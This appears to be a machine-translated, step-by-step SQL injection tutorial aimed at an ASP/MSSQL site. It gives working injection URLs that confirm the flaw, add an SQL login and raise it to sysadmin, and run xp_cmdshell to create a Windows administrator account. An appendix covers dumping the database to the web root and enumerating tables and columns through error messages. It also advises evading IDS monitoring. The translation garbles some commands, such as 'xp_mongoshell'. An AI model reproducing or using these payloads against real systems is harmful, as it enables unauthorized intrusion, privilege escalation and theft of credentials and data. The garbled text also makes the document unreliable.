In a supply and demand information published on the site to test the page http://www.xxx.com/new/new.asp? Id = 49
I did the following test :( 1) http://www.xxx.com/new/new.asp? Id = 49'
Microsoft ole db Provider for ODBC Drivers error 80040e14
[Microsoft] [ODBC Microsoft Access Driver] string syntax error
In the query expression ID = 49.
/New. asp, row 36
(2) http://www.xxx.com/new/new.asp? Id = 49 and 1 = 1
(Normal Return page)
(3) http://www.xxx.com/new/new.asp? Id = 49 and 1 = 2
Microsoft ole db Provider for ODBC Drivers error 800a0bcd
Either BOF or EOF is "true", or the current record has been deleted. The operation required requires a current record.
/New. asp, row 42
Note: The test above shows that there is a chance of SQL injection. We use the following sentence to determine the database type and login identity.
Http: // www.xxx.com/new/new.asp? Id = 49 and user> 0
Microsoft ole db Provider for ODBC Drivers error 800a0bcd
Syntax error when converting nvarchar value "dbo" to an int Column
/New. asp, row 42
Note: If a syntax error occurs when "dbo" is displayed to convert the data type to an int column, you can use the method described below to obtain system management permissions, if a syntax error occurs when "abc" is used to convert a column whose data type is int, you cannot use the following description to obtain system permissions.
After obtaining the preceding information, you can submit the following URL to obtain the SQL administrator and system permissions step by step.
(1) http://www.xxx.com/new/new.asp? Id = 49; exec
Aster. dbo. sp_addlogin fmzm ;--
Add an SQL user
(2) http://www.xxx.com/new/new.asp? Id = 49; exec master. dbo. sp_password null, fmzm, fmzm ;--
Set the password of the SQL account FMZM to FMZM
(3) http://www.xxx.com/new/new.asp? Id = 49; exec master. dbo. sp_addsrvrolemember sysadmin fmzm ;--
Privilege Escalation: Add FMZM to the sysadmin Management Group (sometimes the operation fails.
Exec master. dbo. sp_addsrvrolemember fmzm, sysadmin -- why? I don't know why. I just met?
(4) http://www.xxx.com/new/new.asp? Id = 49; exec master. dbo. xp_mongoshell net user fmzm/workstations: */times: all/passwordchg: yes/passwordreq: yes/active: yes/add ;--
Create a system using FMZM and set its password to FMZM
(Note:/workstations: */times: all/passwordchg: yes/passwordreq: yes/active: yes. If this is not added, the user you created may not be able to log in. These are related settings that enable your account and keep the password permanently expired .)
(5) http://www.xxx.com/new/new.asp? Id = 49; exec master. dbo. xp_mongoshell net localgroup administrators fmzm/add ;--
Add the account FMZM to the Administrator Group
OK. So far, you have obtained the SQL management permission and system permission. What else can't you do? Change the above sentence into a TELNET, or use the SQL connector to connect, whatever you want, do not expose yourself. :) some good IDS have begun to monitor the xp_mongoshell keywords.
Appendix: (1) http: // Site/url. asp? Id = 1; and db_name ()> 0
In the preceding example, and user> 0 is used to obtain the connection username. db_name () is another system variable and returns the name of the connected database.
(2) http: // Site/url. asp? Id = 1; backup database name to disk = 'C: inetpubwwwroot1.db ';--
This is a tough trick. Back up the database name obtained from ③ and the absolute path exposed by some IIS errors to the Web directory, use HTTP to download the entire database. All administrators and user passwords are displayed at a glance! When you do not know the absolute path, you can back up the network address (for example, \ 202.96.xx.xx20.1.db), but the success rate is not high.
(3) asp? Id = 1 "> http: // Site/url. asp? Id = 1; and (Select Top 1 name from sysobjects where xtype = 'U' and status> 0)> 0
Sysobjects is a system table of SQLServer. It stores all table names, views, constraints, and other objects. xtype = 'U' and status> 0 indicates the table name created by the user, the preceding statement extracts the first table name and compares it with 0 to expose the table name with an error message. 2. How can I obtain the name of the third table? Or yes
Consider it yourself.
(4) http: // Site/url. asp? Id = 1; and (Select Top 1 col_name (object_id ('table name'), 1) from sysobjects)> 0
After obtaining the table name from (3), use object_id ('table name') to obtain the internal ID of the table name, col_name (table name ID, 1) represents the table's 1st field names. Replace 1 with 2, 3, 4... you can obtain the field names in the table to be guessed one by one.